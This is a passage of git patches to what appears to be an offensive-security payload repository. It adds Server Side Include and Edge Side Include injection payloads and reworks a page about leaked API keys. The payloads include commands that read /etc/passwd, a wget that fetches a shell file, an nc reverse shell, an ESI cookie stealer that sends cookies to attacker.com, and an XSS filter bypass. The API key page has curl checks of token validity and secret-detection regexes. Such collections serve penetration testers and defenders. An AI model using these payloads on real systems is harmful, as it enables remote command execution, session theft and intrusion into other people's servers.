+<!--#exec cmd="cat /etc/passwd" -->
+<!--#exec cmd="cd C:\WINDOWS\System32">
+<!--#exec cmd="curl http://sn1persecurity.com/.testing/rfi_vuln.php" -->
+<!--#exec cmd="dir" -->
+<!--#exec cmd="ipconfig" -->
+<!--#exec cmd="ls" -->
+<!--#exec cmd="perl -e 'print "X"*5000'" -->
+<!--#exec cmd="sleep 10" -->
+<!--#exec cmd="sleep 5" -->
+<!--#exec cmd="uname" -->
+<!--#exec cmd="wget http://website.com/dir/shell.txt" -->
+<!--#exec cmd="whoami" -->
+<!--#exec cmd="whoami"-->
+<!--#flastmod virtual="echo.html" -->
+<!--#fsize file="ssi.shtml" -->
+<!--#include file=?UUUUUUUU...UU?-->
+<!--#include virtual="/" -->
+<!--#include virtual="/index.html" -->
+<!--#include virtual="http://sn1persecurity.com/.testing/rfi_vuln.php" -->
+<!--#include virtual="https://crowdshield.com/.testing/rfi_vuln.php" -->
+<!--#printenv -->
+</nowiki>
+<esi:debug/>
+<esi:include src="http://google.com%0d%0aX-Forwarded-For:%20127.0.0.1%0d%0aJunkHeader:%20JunkValue/"/>
+<esi:include src="http://host/poc.xml" dca="xslt" stylesheet="http://google.com/poc.xsl" />
+<esi:include src=http://google.com/>
+<pre><!--#echo var="DATE_LOCAL" --> </pre>
+<pre><!--#exec cmd="dir" --></pre>
+<pre><!--#exec cmd="ls" --></pre>
+<pre><!--#exec cmd="whoami"--></pre>
+x=<esi:assign name="var1" value="'cript'"/><s<esi:vars name="$(var1)"/>>alert(/Chrome%20XSS%20filter%20bypass/);</s<esi:vars name="$(var1)"/>>
\ No newline at end of file
diff --git a/Server Side Include Injection/README.md b/Server Side Include Injection/README.md
index 00c6bff593..6ec6cadea1 100644
--- a/Server Side Include Injection/README.md	
+++ b/Server Side Include Injection/README.md	
@@ -6,6 +6,7 @@
 ## Summary
 
 * [Methodology](#methodology)
+* [Edge Side Inclusion](#edge-side-inclusion)
 * [References](#references)
 
 
@@ -13,16 +14,56 @@
 
 SSI Injection occurs when an attacker can input Server Side Include directives into a web application. SSIs are directives that can include files, execute commands, or print environment variables/attributes. If user input is not properly sanitized within an SSI context, this input can be used to manipulate server-side behavior and access sensitive information or execute commands.
 
-| Description             | Payload |
-|-------------------------|---------|
-| Print a date            | `<!--#echo var="DATE_LOCAL" -->` |
-| Print all the variables | `<!--#printenv -->` |
-| Include a file          | `<!--#include file="/etc/passwd" -->` |
-| Execute commands        | `<!--#exec cmd="ls" -->` |
-| Doing a reverse shell   | `<!--#exec cmd="mkfifo /tmp/foo;nc IP PORT 0</tmp/foo|/bin/bash 1>/tmp/foo;rm /tmp/foo" -->` |
+SSI format: `<!--#directive param="value" -->`
+
+| Description             | Payload                                  |
+| ----------------------- | ---------------------------------------- |
+| Print the date          | `<!--#echo var="DATE_LOCAL" -->`         |
+| Print the document name | `<!--#echo var="DOCUMENT_NAME" -->`      |
+| Print all the variables | `<!--#printenv -->`                      |
+| Setting variables       | `<!--#set var="name" value="Rich" -->`   |
+| Include a file          | `<!--#include file="/etc/passwd" -->`    |
+| Include a file          | `<!--#include virtual="/index.html" -->` |
+| Execute commands        | `<!--#exec cmd="ls" -->`                 |
+| Reverse shell           | `<!--#exec cmd="mkfifo /tmp/f;nc IP PORT 0</tmp/f\|/bin/bash 1>/tmp/f;rm /tmp/f" -->` |
+
+
+## Edge Side Inclusion
+
+HTTP surrogates cannot differentiate between genuine ESI tags from the upstream server and malicious ones embedded in the HTTP response. This means that if an attacker manages to inject ESI tags into the HTTP response, the surrogate will process and evaluate them without question, assuming they are legitimate tags originating from the upstream server.
+
+Some surrogates will require ESI handling to be signaled in the Surrogate-Control HTTP header.
+
+```ps1
+Surrogate-Control: content="ESI/1.0"
+```
+
+| Description             | Payload                                  |
+| ----------------------- | ---------------------------------------- |
+| Blind detection         | `<esi:include src=http://attacker.com>`  |
+| XSS                     | `<esi:include src=http://attacker.com/XSSPAYLOAD.html>` |
+| Cookie stealer          | `<esi:include src=http://attacker.com/?cookie_stealer.php?=$(HTTP_COOKIE)>` |
+| Include a file          | `<esi:include src="supersecret.txt">` |
+| Display debug info      | `<esi:debug/>` |
+| Add header              | `<!--esi $add_header('Location','http://attacker.com') -->` |
+| Inline fragment         | `<esi:inline name="/attack.html" fetchable="yes"><script>prompt('XSS')</script></esi:inline>` |
+
+
+| Software | Includes | Vars | Cookies | Upstream Headers Required | Host Whitelist |
+| -------- | -------- | ---- | ------- | ------------------------- | -------------- |
+| Squid3   | Yes      | Yes  | Yes     | Yes                       | No             |
+| Varnish Cache	| Yes | No   | No      | Yes                       | Yes            |
+| Fastly   | Yes      | No   | No      | No                        | Yes            |
+| Akamai ESI Test Server (ETS) | Yes | Yes | Yes | No              | No             |
+| NodeJS' esi | Yes	  | Yes  | Yes     | No                        | No             |
+| NodeJS' nodesi | Yes | No  | No      | No                        | Optional       |
 
 
 ## References
 
+* [Beyond XSS: Edge Side Include Injection - Louis Dion-Marcil - April 3, 2018](https://www.gosecure.net/blog/2018/04/03/beyond-xss-edge-side-include-injection/)
+* [DEF CON 26 - Edge Side Include Injection Abusing Caching Servers into SSRF - ldionmarcil - October 23, 2018](https://www.youtube.com/watch?v=VUZGZnpSg8I)
+* [ESI Injection Part 2: Abusing specific implementations - Philippe Arteau - May 2, 2019](https://gosecure.ai/blog/2019/05/02/esi-injection-part-2-abusing-specific-implementations/)
 * [Exploiting Server Side Include Injection - n00py - August 15, 2017](https://www.n00py.io/2017/08/exploiting-server-side-include-injection/)
+* [Server Side Inclusion/Edge Side Inclusion Injection - HackTricks - July 19, 2024](https://book.hacktricks.xyz/pentesting-web/server-side-inclusion-edge-side-inclusion-injection)
 * [Server-Side Includes (SSI) Injection - Weilin Zhong, Nsrav - December 4, 2019](https://owasp.org/www-community/attacks/Server-Side_Includes_(SSI)_Injection)
\ No newline at end of file

From 4e03772f4a119dcb76bfa30b344203cf538e1431 Mon Sep 17 00:00:00 2001
From: Swissky <12152583+swisskyrepo@users.noreply.github.com>
Date: Mon, 18 Nov 2024 18:26:58 +0100
Subject: [PATCH 4/4] API Key rework

---
 API Key Leaks/README.md | 171 +++++++++++-----------------------------
 1 file changed, 47 insertions(+), 124 deletions(-)

diff --git a/API Key Leaks/README.md b/API Key Leaks/README.md
index c420581a4c..9bbd46c79f 100644
--- a/API Key Leaks/README.md	
+++ b/API Key Leaks/README.md	
@@ -1,166 +1,89 @@
 # API Key and Token Leaks
 
-> The API key is a unique identifier that is used to authenticate requests associated with your project. Some developers might hardcode them or leave it on public shares.
+> API keys and tokens are forms of authentication commonly used to manage permissions and access to both public and private services. Leaking these sensitive pieces of data can lead to unauthorized access, compromised security, and potential data breaches.
 
 ## Summary
 
 - [Tools](#tools)
 - [Methodology](#exploit)
-    - [Google Maps](#google-maps)
-    - [Algolia](#algolia)
-    - [Slack API Token](#slack-api-token)
-    - [Facebook Access Token](#facebook-access-token)
-    - [Github client id and client secret](#github-client-id-and-client-secret)
-    - [Twilio Account_sid and Auth Token](#twilio-account_sid-and-auth-token)
-    - [Twitter API Secret](#twitter-api-secret)
-    - [Twitter Bearer Token](#twitter-bearer-token)
-    - [Gitlab Personal Access Token](#gitlab-personal-access-token)
-    - [HockeyApp API Token](#hockeyapp-api-token)
-    - [Mapbox API Token](#mapbox-api-token)
+    - [Common Causes of Leaks](#common-causes-of-leaks)
+    - [Validate The API Key](#validate-the-api-key)
+- [References](#references)
 
 
 ## Tools
 
+- [aquasecurity/trivy](https://github.com/aquasecurity/trivy) - General purpose vulnerability and misconfiguration scanner which also searches for API keys/secrets
+- [blacklanternsecurity/badsecrets](https://github.com/blacklanternsecurity/badsecrets) - A library for detecting known or weak secrets on across many platforms
+- [d0ge/sign-saboteur](https://github.com/d0ge/sign-saboteur) - SignSaboteur is a Burp Suite extension for editing, signing, verifying various signed web tokens
+- [mazen160/secrets-patterns-db](https://github.com/mazen160/secrets-patterns-db) - Secrets Patterns DB: The largest open-source Database for detecting secrets, API keys, passwords, tokens, and more.
 - [momenbasel/KeyFinder](https://github.com/momenbasel/KeyFinder) - is a tool that let you find keys while surfing the web
 - [streaak/keyhacks](https://github.com/streaak/keyhacks) - is a repository which shows quick ways in which API keys leaked by a bug bounty program can be checked to see if they're valid
 - [trufflesecurity/truffleHog](https://github.com/trufflesecurity/truffleHog) - Find credentials all over the place
-    ```ps1
-    ## Scan a Github Organization
-    docker run --rm -it -v "$PWD:/pwd" trufflesecurity/trufflehog:latest github --org=trufflesecurity
-    
-    ## Scan a GitHub Repository, its Issues and Pull Requests
-    docker run --rm -it -v "$PWD:/pwd" trufflesecurity/trufflehog:latest github --repo https://github.com/trufflesecurity/test_keys --issue-comments --pr-comments
-   
-    ## Scan a Docker image for verified secrets
-    docker run --rm -it -v "$PWD:/pwd" trufflesecurity/trufflehog:latest docker --image trufflesecurity/secrets
-    ```
-- [aquasecurity/trivy](https://github.com/aquasecurity/trivy) - General purpose vulnerability and misconfiguration scanner which also searches for API keys/secrets
 - [projectdiscovery/nuclei-templates](https://github.com/projectdiscovery/nuclei-templates) - Use these templates to test an API token against many API service endpoints
     ```powershell
     nuclei -t token-spray/ -var token=token_list.txt
     ```
-- [blacklanternsecurity/badsecrets](https://github.com/blacklanternsecurity/badsecrets) - A library for detecting known or weak secrets on across many platforms
-    ```ps1
-    python examples/cli.py --url http://example.com/contains_bad_secret.html
-    python examples/cli.py eyJhbGciOiJIUzI1NiJ9.eyJJc3N1ZXIiOiJJc3N1ZXIiLCJVc2VybmFtZSI6IkJhZFNlY3JldHMiLCJleHAiOjE1OTMxMzM0ODMsImlhdCI6MTQ2NjkwMzA4M30.ovqRikAo_0kKJ0GVrAwQlezymxrLGjcEiW_s3UJMMCo
-    python ./badsecrets/examples/blacklist3r.py --viewstate /wEPDwUJODExMDE5NzY5ZGQMKS6jehX5HkJgXxrPh09vumNTKQ== --generator EDD8C9AE
-    python ./badsecrets/examples/telerik_knownkey.py --url http://vulnerablesite/Telerik.Web.UI.DialogHandler.aspx
-    python ./badsecrets/examples/symfony_knownkey.py --url https://localhost/
-    ```
-- [mazen160/secrets-patterns-db](https://github.com/mazen160/secrets-patterns-db) - Secrets Patterns DB: The largest open-source Database for detecting secrets, API keys, passwords, tokens, and more.
-- [d0ge/sign-saboteur](https://github.com/d0ge/sign-saboteur) - SignSaboteur is a Burp Suite extension for editing, signing, verifying various signed web tokens
 
 
 ## Methodology
 
-The following commands can be used to takeover accounts or extract personal information from the API using the leaked token.
-
-### Google Maps 
-
-* [ozguralp/gmapsapiscanner/](https://github.com/ozguralp/gmapsapiscanner/) - Google Maps API Scanner
-
-|  Name                 |  Endpoint |
-| --------------------- | --------- |
-|  Static Maps          | [/maps/api/staticmap?key=KEY](https://maps.googleapis.com/maps/api/staticmap?center=45%2C10&zoom=7&size=400x400&key=KEY) |
-|  Streetview           | [/maps/api/streetview?key=KEY](https://maps.googleapis.com/maps/api/streetview?size=400x400&location=40.720032,-73.988354&fov=90&heading=235&pitch=10&key=KEY) |
-|  Embed                | [/maps/embed/v1/place?key=KEY](https://www.google.com/maps/embed/v1/place?q=place_id:ChIJyX7muQw8tokR2Vf5WBBk1iQ&key=KEY) |
-|  Directions           | [/maps/api/directions/json?key=KEY](https://maps.googleapis.com/maps/api/directions/json?origin=Disneyland&destination=Universal+Studios+Hollywood4&key=KEY) |
-|  Geocoding            | [/maps/api/geocode/json?key=KEY](https://maps.googleapis.com/maps/api/geocode/json?latlng=40,30&key=KEY) |
-|  Distance Matrix      | [/maps/api/distancematrix/json?key=KEY](https://maps.googleapis.com/maps/api/distancematrix/json?units=imperial&origins=40.6655101,-73.89188969999998&destinations=40.6905615%2C-73.9976592%7C40.6905615%2C-73.9976592%7C40.6905615%2C-73.9976592%7C40.6905615%2C-73.9976592%7C40.6905615%2C-73.9976592%7C40.6905615%2C-73.9976592%7C40.659569%2C-73.933783%7C40.729029%2C-73.851524%7C40.6860072%2C-73.6334271%7C40.598566%2C-73.7527626%7C40.659569%2C-73.933783%7C40.729029%2C-73.851524%7C40.6860072%2C-73.6334271%7C40.598566%2C-73.7527626&key=KEY) |
-|  Find Place from Text | [/maps/api/place/findplacefromtext/json?key=KEY](https://maps.googleapis.com/maps/api/place/findplacefromtext/json?input=Museum%20of%20Contemporary%20Art%20Australia&inputtype=textquery&fields=photos,formatted_address,name,rating,opening_hours,geometry&key=KEY) |
-|  Autocomplete         | [/maps/api/place/autocomplete/json?key=KEY](https://maps.googleapis.com/maps/api/place/autocomplete/json?input=Bingh&types=%28cities%29&key=KEY) |
-|  Elevation            | [/maps/api/elevation/json?key=KEY](https://maps.googleapis.com/maps/api/elevation/json?locations=39.7391536,-104.9847034&key=KEY)   |
-|  Timezone             | [/maps/api/timezone/json?key=KEY](https://maps.googleapis.com/maps/api/timezone/json?location=39.6034810,-119.6822510&timestamp=1331161200&key=KEY) |
-|  Roads                | [roads.googleapis.com/v1/nearestRoads?key=KEY](https://roads.googleapis.com/v1/nearestRoads?points=60.170880,24.942795&key=KEY) |
-|  Geolocate            | [www.googleapis.com/geolocation/v1/geolocate?key=KEY](https://www.googleapis.com/geolocation/v1/geolocate?key=KEY) |
-
-
-**Impact**:
-
-* Consuming the company's monthly quota or can over-bill with unauthorized usage of this service and do financial damage to the company
-* Conduct a denial of service attack specific to the service if any limitation of maximum bill control settings exist in the Google account
-
-
-### Algolia 
-
-```powershell
-curl --request PUT \
-  --url https://<application-id>-1.algolianet.com/1/indexes/<example-index>/settings \
-  --header 'content-type: application/json' \
-  --header 'x-algolia-api-key: <example-key>' \
-  --header 'x-algolia-application-id: <example-application-id>' \
-  --data '{"highlightPreTag": "<script>alert(1);</script>"}'
-```
-
-
-### Slack API Token
-
-```powershell
-curl -sX POST "https://slack.com/api/auth.test?token=xoxp-TOKEN_HERE&pretty=1"
-```
-
-
-### Facebook Access Token
-
-```powershell
-curl https://developers.facebook.com/tools/debug/accesstoken/?access_token=ACCESS_TOKEN_HERE&version=v3.2
-```
-
-
-### Github client id and client secret
-
-```powershell
-curl 'https://api.github.com/users/whatever?client_id=xxxx&client_secret=yyyy'
-```
-
-
-### Twilio Account_sid and Auth token
-
-```powershell
-curl -X GET 'https://api.twilio.com/2010-04-01/Accounts.json' -u ACCOUNT_SID:AUTH_TOKEN
-```
+* **API Keys**: Unique identifiers used to authenticate requests associated with your project or application.
+* **Tokens**: Security tokens (like OAuth tokens) that grant access to protected resources.
+     
+### Common Causes of Leaks
 
+* **Hardcoding in Source Code**: Developers may unintentionally leave API keys or tokens directly in the source code.
 
-### Twitter API Secret
+    ```py     
+    # Example of hardcoded API key
+    api_key = "1234567890abcdef"
+    ```
 
-```powershell
-curl -u 'API key:API secret key' --data 'grant_type=client_credentials' 'https://api.twitter.com/oauth2/token'
-```
+* **Public Repositories**: Accidentally committing sensitive keys and tokens to publicly accessible version control systems like GitHub.
 
+    ```ps1
+    ## Scan a Github Organization
+    docker run --rm -it -v "$PWD:/pwd" trufflesecurity/trufflehog:latest github --org=trufflesecurity
+    
+    ## Scan a GitHub Repository, its Issues and Pull Requests
+    docker run --rm -it -v "$PWD:/pwd" trufflesecurity/trufflehog:latest github --repo https://github.com/trufflesecurity/test_keys --issue-comments --pr-comments
+    ```
 
-### Twitter Bearer Token
+* **Hardcoding in Docker Images**: API keys and credentials might be hardcoded in Docker images hosted on DockerHub or private registries.
 
-```powershell
-curl --request GET --url https://api.twitter.com/1.1/account_activity/all/subscriptions/count.json --header 'authorization: Bearer TOKEN'
-```
+    ```ps1
+    # Scan a Docker image for verified secrets
+    docker run --rm -it -v "$PWD:/pwd" trufflesecurity/trufflehog:latest docker --image trufflesecurity/secrets
+    ```
 
+* **Logs and Debug Information**: Keys and tokens might be inadvertently logged or printed during debugging processes.
 
-### Gitlab Personal Access Token
+* **Configuration Files**: Including keys and tokens in publicly accessible configuration files (e.g., .env files, config.json, settings.py, or .aws/credentials.).
 
-```powershell
-curl "https://gitlab.example.com/api/v4/projects?private_token=<your_access_token>"
-```
 
+### Validate The API Key
 
-### HockeyApp API Token
+If assistance is needed in identifying the service that generated the token, [mazen160/secrets-patterns-db](https://github.com/mazen160/secrets-patterns-db) can be consulted. It is the largest open-source database for detecting secrets, API keys, passwords, tokens, and more. This database contains regex patterns for various secrets.
 
-```powershell
-curl -H "X-HockeyAppToken: ad136912c642076b0d1f32ba161f1846b2c" https://rink.hockeyapp.net/api/2/apps/2021bdf2671ab09174c1de5ad147ea2ba4
+```yaml
+patterns:
+  - pattern:
+      name: AWS API Gateway
+      regex: '[0-9a-z]+.execute-api.[0-9a-z._-]+.amazonaws.com'
+      confidence: low
+  - pattern:
+      name: AWS API Key
+      regex: AKIA[0-9A-Z]{16}
+      confidence: high
 ```
 
+Use [streaak/keyhacks](https://github.com/streaak/keyhacks) or read the documentation of the service to find a quick way to verify the validity of an API key.
 
-### Mapbox API Token
-
-A Mapbox API Token is a JSON Web Token (JWT). If the header of the JWT is `sk`, jackpot. If it's `pk` or `tk`, it's not worth your time.
+* **Example**: Telegram Bot API Token
 
-* Check token validity: 
-    ```ps1
-    curl "https://api.mapbox.com/tokens/v2?access_token=YOUR_MAPBOX_ACCESS_TOKEN"
-    ```
-    
-* Get list of all tokens associated with an account (only works if the token is a Secret Token (sk), and has the appropriate scope)
     ```ps1
-    curl "https://api.mapbox.com/tokens/v2/MAPBOX_USERNAME_HERE?access_token=YOUR_MAPBOX_ACCESS_TOKEN"
+    curl https://api.telegram.org/bot<TOKEN>/getMe
     ```